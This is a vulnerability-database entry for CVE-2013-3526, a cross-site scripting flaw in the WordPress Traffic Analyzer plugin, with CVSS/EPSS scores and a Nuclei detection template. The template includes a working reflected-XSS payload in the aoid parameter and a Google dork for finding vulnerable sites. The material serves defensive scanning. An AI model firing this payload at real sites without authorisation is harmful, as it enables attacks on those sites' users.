Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2013-3526
HistoryJul 11, 2021 - 2:00 a.m.

WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting

2021-07-1102:00:15
ProjectDiscovery
github.com
2

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

5.9 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

76.8%

A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."

id: CVE-2013-3526

info:
  name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions.
  remediation: |
    Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2013-3526
    - http://packetstormsecurity.com/files/121167/WordPress-Traffic-Analyzer-Cross-Site-Scripting.html
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/83311
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2013-3526
    cwe-id: CWE-79
    epss-score: 0.00519
    epss-percentile: 0.76703
    cpe: cpe:2.3:a:wptrafficanalyzer:trafficanalyzer:1.0.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: wptrafficanalyzer
    product: trafficanalyzer
    google-query: "inurl:\"/wp-content/plugins/trafficanalyzer\""
  tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - 'traffic analy'
          - 'Tags:'
        condition: and

  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402207ee2266839819c8d988e3fa222e2c471bcd72d268986a3b55ef7cd5254078659022040278011c08a10348e0f4b2c391a9cd541c03006764111a8bf756d82c5e581c5:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

5.9 Medium

AI Score

Confidence

High

0.005 Low

EPSS

Percentile

76.8%